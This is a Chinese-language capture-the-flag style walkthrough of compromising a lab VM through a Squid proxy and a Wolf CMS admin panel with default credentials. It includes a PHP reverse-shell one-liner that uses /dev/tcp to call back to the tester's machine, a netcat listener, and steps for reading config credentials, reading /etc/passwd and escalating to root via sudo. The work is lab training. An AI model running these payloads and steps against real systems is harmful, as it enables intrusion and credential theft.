信息扫瞄
sudo nmap -sn 192.168.203.0/24
扫描主机,寻找端口
sudo nmap --min-rate 10000 -p- 192.168.203.141
发现了端口有,22,3128,8080。开放的端口只有22和3128。
找到端口后,进行端口扫描
sudo nmap -sT -sV -O -p22,3128,8080 192.168.203.141
-sT:指定TCP扫描
-sV:对服务版本进行探测
-O:对操作系统进行探测
再进行对UDP的扫描
sudo nmap -sU -p22,3128 192.168.203.141
进行nmap的漏洞脚本扫描
sudo nmap --script=vuln -p22,3128,8080 192.168.203.141
可以了解到,3128端口是squid 3.1.19的这么个代理
没有更多的信息,但依旧要进行信息的记录。
打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。
目录爆破
sudo dirb http://192.168.203.141:3128
没什么信息,我们换个方式再进行爆破
sudo gobuster dir -u http://192.168.203.141 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
发现抱错了,很可能是因为代理或者防火墙的原因我们无法进行目录爆破。
那我们就用代理的方式进行一个扫描
sudo dirb http://192.168.203.141 -p http://192.168.203.141:3128
发现可以扫描,代码为200的都是有效的。
所以我们进入网页的时候也要设置代理,步骤如下
我们通过代理服务,再次去进行访问192.168.203.141,不加端口号进行访问
发现我们可以访问到靶机的外部服务。这样这部分就访问到这里,我们接着去访问我们之前爆破出来的目录。
首先是robots(和robots.txt内容是一致的)
我们去访问这个暴露出来的wolfcms
好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有administertor的字眼,兴许就是通过管理员发送的。
这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;2.百度;去进行查询。
可以去搜索wolf cms漏洞,可以查出路径为:
http:// IP地址 /wolfcms/?/admin/login
我们进行访问
http://192.168.203.141/wolfcms/?/admin/login
输入弱口令:
user:admin
password:admin
登录进来之后,进入articles,注入php一句话木马。指定的ip是我们kali的ip,用于检测。端口设置为443。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.203.139/443 0>&1'");?>
保存退出。在正式执行之前,我们在kali里打开443端口的监听
sudo nc -lvnp 443
我们点击articles
可以看到,我们kali收到了反弹shell。
查看用户
whoami
我们查看一下菜单。
我们发现有config.php,这个文件大概率都存在用户名和密码。我们使用vi打开
vi config.php
这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。所以我们要去查询。
cat /etc/passwd
我们发现有root用户。而且有很多的bash环境的用户。我们查询一下这台机器。
uname -a
通过查询,我们也需要留意一下sickos用户。
我们去尝试一下,打开新的命令界面
sudo ssh root@192.168.203.141
密码不对,我们再做别的帐号尝试。
再尝试
发现可以了。尝试提权。
sudo -l
sudo /bin/bash
我们进入root的家目录
cd /root
这样,我们就得到了root用户权限。